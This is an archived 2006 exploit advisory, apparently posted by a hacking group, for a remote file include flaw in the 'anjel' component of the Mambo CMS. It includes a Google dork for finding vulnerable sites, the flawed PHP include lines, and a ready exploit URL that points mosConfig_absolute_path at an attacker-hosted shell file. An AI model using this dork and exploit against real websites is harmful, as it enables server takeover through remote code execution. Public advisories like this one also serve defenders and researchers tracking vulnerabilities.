Lucene search
SecurityvulnsSECURITYVULNS:DOC:13956HistoryAug 21, 2006 - 12:00 a.m.
anjel Mambo Component Remote File Include
2006-08-2100:00:00
vulners.com
91
!!!WWW.SiBERSAVASCiLAR.COM!!!
Title : anjel Mambo Component Remote File Include Vulnerabilities
#Author: Crackers_Child
#cont@ct: [email protected]
Google Dorks : inurl:"/com_anjel/"
Application : anjel Component of Mambo
Bug İn anjel.index.php
include_once( '…/…/globals.php' );
require_once( '…/…/configuration.php' );
require_once( $mosConfig_absolute_path . '/includes/joomla.php' );
Exploit:
http://[target]/[mambo_path]/components/com_anjel/anjel.index.php?mosConfig_absolute_path=Shell.txt?
greets:
All My Friends And SiberSavascilar.Com Members !
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------